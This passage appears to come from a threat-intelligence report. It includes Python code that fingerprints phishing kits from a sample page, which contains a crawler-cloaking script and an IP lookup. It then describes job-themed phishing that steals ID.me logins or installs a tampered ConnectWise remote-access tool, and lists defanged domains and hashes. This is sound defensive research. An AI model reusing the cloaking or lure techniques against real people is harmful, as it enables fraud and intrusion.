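    """Return the per-widget portion of a Turnstile sitekey for pivoting in URLScan/Censys/Shodan."""
    return sitekey[len(TURNSTILE_PREFIX):] if sitekey.startswith(TURNSTILE_PREFIX) else sitekey


# Constructed page source combining tells from both reports; only the GTM ID and the
# Turnstile sitekey are values the reports actually cite.
SAMPLE_HTML = """
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-T75PDC7R"></script>
<div class="cf-turnstile" data-sitekey="0x4AAAAAACG6TJhrsuZdpjsN"></div>
<img src="/wp-content/uploads/2025/09/WhatsApp-Image-2025-09-02.jpeg" alt="logo">
<form action="/wp-admin/admin-ajax.php" method="post">
<script>
fetch("https://api.ipify.org/?format=json").then(r => r.json()).then(j => checkIp(j.ip));
if (/Googlebot|Bingbot|AhrefsBot|Twitterbot/i.test(navigator.userAgent)) {
  document.body.innerHTML = "<h1>404 Not Found</h1>";
}
</script>
"""

if __name__ == "__main__":
    fp = fingerprint_kit(SAMPLE_HTML)
    for name in fp.indicators():
        print(f"{name}: {getattr(fp, name)}")
    for key in fp.turnstile_sitekeys:
        print("pivot on Turnstile widget id:", turnstile_pivot(key))
```

Fetch the page source with a normal browser User-Agent, since the gatekeeping described above serves a decoy to anything that looks like a scanner.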
Other domains suspected of being in an associated cluster of activity were also identified masquerading as legitimate small company brands with job interview meeting invites. However, these domains do not simply attempt to steal credentials through fake logon pages. Instead, they deliver a malicious Windows installation file that provides remote access to the compromised machine.
Initial phishing domain: mlcrsoftedge[.]com. The site itself purports to be and links to https[:]//lsxconstructions[.]com/, a seemingly legitimate construction company website, which was created 2025-02-01 and redirects to lsxconstruction[.]com.
When users receive the meeting invite and click the "Join Meeting" button, they unknowingly initiate a download of a modified, unsigned installation file for Connectwise, a remote access tool.
Bundled files such as 7027b69ab6ebc9f3f7d2f6c800793fde2a057b76010d8cfd831cf440371b2b23 are linked to multiple reports of impersonation attacks and Connectwise phishing campaigns going back to 2025-04-23. The majority of the recent activity appears to have started around 2025-11.
Conclusion
The identified phishing activities use domain masquerades with a job theme and consist of two distinct attack types. One focuses on harvesting ID.me credentials, which are used to access government services (IRS, SSA, VA) and facilitate financial fraud. The second delivers a malicious, unsigned remote access tool (Connectwise) disguised as a Microsoft Teams link, resulting in system compromise. While there’s no definitive evidence the two clusters are linked to the same actor, the registration patterns, themes – specifically, masquerading as small companies – and timeframe appear highly correlated.
IOCs
Domains:
mlcrsoftedge[.]com
clock-towerrealty[.]org
apply-untide[.]rentals
from-unietd[.]rentals
frosm-unitde[.]rentals
from-united[.]rentals
forms-unitde[.]rentals
froms-united[.]rentals
SHA256: 4107f8e0d6597866d4beb7c30718935353782dc7e199d3956fd10c8456383feb
Google Tag Manager: GTM-T75PDC7R